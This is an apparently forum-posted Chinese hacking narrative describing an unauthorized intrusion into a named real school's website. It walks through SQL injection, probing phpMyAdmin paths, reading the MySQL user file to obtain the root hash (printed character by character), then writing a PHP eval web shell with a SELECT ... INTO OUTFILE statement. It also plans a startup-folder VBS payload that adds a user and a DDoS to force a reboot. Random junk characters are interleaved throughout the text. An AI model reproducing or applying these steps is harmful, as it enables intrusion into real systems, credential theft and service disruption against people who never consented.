友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
5 A0 K( C! N/ d: O! Z发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


. P! D  E0 P1 e& I7 K
8 g% S8 z2 g* i( u( `常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

3 ?4 P/ C4 O, O$ H$ M' T) k& ]( d那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

8 Z* a+ I( H% N& k% ~# F试着爆绝对路径：
) K  J* e  y$ Q1./phpMyAdmin/index.php?lang[]=1  
1 r% S) z" i" v# `  R9 V2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
; u. p" {; W9 P6 d5 D3 y5./phpmyadmin/libraries/select_lang.lib.php  
+ G0 {5 @1 \: `/ T5 l6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
/ b1 E# q  Q0 D% K6 t, A8./phpmyadmin/libraries/export/xls.php  

5 \3 V1 o7 y5 H均不行...........................
- D& d5 ?9 K9 @( U4 J7 ^$ p, W  s
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

& F' H; c' T+ ]! i7 {权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
$ E# a$ W) }6 M; {
& V- Z) D5 K0 Z+ c默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
. k3 j- |5 ?( p$ P, m4 u/ K; ^/ G
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
" c4 `, e% c& G' b1 n& L
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
; M* N0 I. |7 o/ N3 v7 t6 h
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
4 f- K0 F0 W" V1 }3 j* U+ L7 p  ?  l
; U8 ^4 d3 h: ]( v0 Q自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

17---- r(0072)
, w3 d% K" R# r; m18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
9 a4 c/ k' A' m22---- 8(0038)
) n- C: L8 c( N5 A23---- 2(0032)
24---- E(0045)
& ^6 ^3 W1 o1 n+ h( E25---- 1(0031)
26---- C(0043)
  r1 G& D3 R* w; e27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
31---- A(0041)
- c, t3 N, G+ `4 [8 g% R32---- 9(0039)
/ J7 c; H8 X+ u( B$ i33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
' r/ E* X+ c( }5 k, z; \5 |' y38---- 4(0034)
8 `; [9 U) Y- m" y) r39---- 9(0039)
7 `7 L1 Y! i$ Q/ l( m% T40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
: i9 p9 g* u$ w9 V2 j& p6 m43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
/ W5 w' g: q, U- v6 I46---- 8(0038)
2 f% {& x! y3 I: n& C+ S3 t47---- F(0046)
9 u* v: h' o/ Z! K6 E; B48---- F(0046)
( d- t6 O& o! K8 E# m% ]# ]- w49---- 4(0034)
8 r; @; Y9 \' I8 b8 C4 S50---- F(0046)
: H: Q. v9 d2 X& ^51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
54---- A(0041)
' S3 ~! f# p. Z; B& }55---- 4(0034)
$ ^, b2 v- F9 i) }. g* E56---- A(0041)
57---- B(0042)
5 [2 A/ B8 e) d" P58---- *(0044)
59---- *(0035)
60---- *(0041)
, X1 M+ e. h, I61---- *0032)

# i2 n9 [* e6 w' k+ u0 H, h解密后成功登陆phpmyamin
                          

                             
. h5 F9 F' K! G4 G
. p9 L! S/ H, q( |# Y找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
( g- t5 E: y/ j6 _
5 _0 o( W& i( v$ U+ S成功执行，拿下shell，菜刀连接：
8 c% {2 B: z9 d$ v8 X; N% e- c
服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
2 x* H* G) j! u

服务器上已经有个隐藏帐号了

别名     administrators
, A& X: g, i! e% ]4 b注释     管理员对计算机/域有不受限制的完全访问权

成员

& {, ~9 U' k/ h% t$ l( Q% e1 t4 x

-------------------------------------------------------------------------------
admin
Administrator
slipper$
6 x4 q1 k. m. @sqluser
命令成功完成。

# ]  `. ?6 P' j+ N服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
/ a% H" j, ?$ e1 p3 k) ?6 `  o
ddos服务器重启，不然就只能坐等服务器重启了...............................
, S( J$ h3 |/ Y, @0 l' |
8 T2 k6 Y# {9 S      

  T6 K+ u9 ?5 e3 J$ k' E6 c

angel